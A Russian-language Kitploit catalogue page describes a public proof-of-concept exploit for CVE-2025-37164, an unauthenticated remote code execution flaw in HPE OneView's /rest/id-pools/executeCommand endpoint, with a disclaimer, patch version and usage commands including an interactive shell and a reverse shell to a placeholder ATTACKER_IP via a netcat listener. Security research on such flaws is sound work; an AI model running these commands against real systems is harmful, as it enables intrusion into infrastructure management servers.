Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-37164-PoC — Доказательство концепции эксплуатации для CVE-2025-37164 — критической уязвимости удалённого выполнения кода без аутентификации в HPE OneView через конечную точку /rest/id-pools/executeCommand. | Kitploit
Инструменты/GitHubGitHub/g0vguy/cve-2025-37164-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

Доказательство концепции эксплуатации для CVE-2025-37164 — критической уязвимости удалённого выполнения кода без аутентификации в HPE OneView через конечную точку /rest/id-pools/executeCommand.

Репозиторий
628 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-37164 - PoC неаутентифицированного RCE для HPE OneView

Эксплойт Proof-of-Concept для CVE-2025-37164 — критической (CVSS 10.0) уязвимости неаутентифицированного удалённого выполнения кода в HPE OneView.

ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.

  • Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам противозаконен
  • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным инструментом
  • Инструмент предназначен для оборонительных исследований безопасности и тестирования на проникновение в контролируемых средах

Сведения об уязвимости

  • Идентификатор CVE: CVE-2025-37164
  • Оценка CVSS: 10.0 (КРИТИЧЕСКАЯ)
  • Вендор: Hewlett Packard Enterprise (HPE)
  • Продукт: HPE OneView (версии до 11.0)
  • Тип: Неаутентифицированное удалённое выполнение кода
  • Патч: Обновите HPE OneView до версии 11.0 или выше

Технический анализ: Уязвимость присутствует в эндпоинте PUT /rest/id-pools/executeCommand, который не требует аутентификации и передаёт вводимые пользователем данные напрямую в .

Runtime.exec()

Предварительные требования

  • Python 3.6+
  • библиотека requests (pip install requests)
  • Уязвимый экземпляр HPE OneView (с включённой функцией 'id pools')

Использование

root@kitploit:~
# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
Скачать инструмент